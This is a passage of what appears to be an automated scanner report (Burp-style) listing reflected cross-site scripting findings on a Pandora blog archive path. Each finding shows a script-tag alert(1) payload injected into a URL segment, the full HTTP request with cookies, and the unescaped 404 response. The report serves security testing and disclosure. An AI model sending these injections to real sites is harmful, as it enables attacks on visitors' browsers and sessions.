Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:06 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/01b4d46<script>alert(1)</script>419734980f5/ was not found on this server.</p>
...[SNIP]...

3.189. http://blog.pandora.com/pandora/archives/2009/02/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/02/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4d541<script>alert(1)</script>2442df8266b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora4d541<script>alert(1)</script>2442df8266b/archives/2009/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:35 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora4d541<script>alert(1)</script>2442df8266b/archives/2009/02/ was not found on this server.</p>
...[SNIP]...

3.190. http://blog.pandora.com/pandora/archives/2009/02/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/02/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a4a2<script>alert(1)</script>ff59d7e80db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives4a4a2<script>alert(1)</script>ff59d7e80db/2009/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4a4a2<script>alert(1)</script>ff59d7e80db/2009/02/ was not found on this server.</p>
...[SNIP]...

3.191. http://blog.pandora.com/pandora/archives/2009/02/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/02/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 714ce<script>alert(1)</script>bf225eb4a1f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009714ce<script>alert(1)</script>bf225eb4a1f/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009714ce<script>alert(1)</script>bf225eb4a1f/02/ was not found on this server.</p>
...[SNIP]...

3.192. http://blog.pandora.com/pandora/archives/2009/02/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/02/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 92265<script>alert(1)</script>2c48c4d86bc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/0292265<script>alert(1)</script>2c48c4d86bc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/0292265<script>alert(1)</script>2c48c4d86bc/ was not found on this server.</p>
...[SNIP]...

3.193. http://blog.pandora.com/pandora/archives/2009/03/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/03/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload efa04<script>alert(1)</script>a909529678b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraefa04<script>alert(1)</script>a909529678b/archives/2009/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraefa04<script>alert(1)</script>a909529678b/archives/2009/03/ was not found on this server.</p>
...[SNIP]...

3.194. http://blog.pandora.com/pandora/archives/2009/03/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/03/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bc94c<script>alert(1)</script>9dc1dabafdc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesbc94c<script>alert(1)</script>9dc1dabafdc/2009/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:44 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbc94c<script>alert(1)</script>9dc1dabafdc/2009/03/ was not found on this server.</p>
...[SNIP]...

3.195. http://blog.pandora.com/pandora/archives/2009/03/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/03/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c2a57<script>alert(1)</script>b7dc6cce338 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009c2a57<script>alert(1)</script>b7dc6cce338/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009c2a57<script>alert(1)</script>b7dc6cce338/03/ was not found on this server.</p>
...[SNIP]...

3.196. http://blog.pandora.com/pandora/archives/2009/03/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/03/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61662<script>alert(1)</script>e1daff6cf96 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/0361662<script>alert(1)</script>e1daff6cf96/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:49 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/0361662<script>alert(1)</script>e1daff6cf96/ was not found on this server.</p>
...[SNIP]...

3.197. http://blog.pandora.com/pandora/archives/2009/04/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/04/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7af11<script>alert(1)</script>1a13f4a03d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora7af11<script>alert(1)</script>1a13f4a03d2/archives/2009/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora7af11<script>alert(1)</script>1a13f4a03d2/archives/2009/04/ was not found on this server.</p>
...[SNIP]...

3.198. http://blog.pandora.com/pandora/archives/2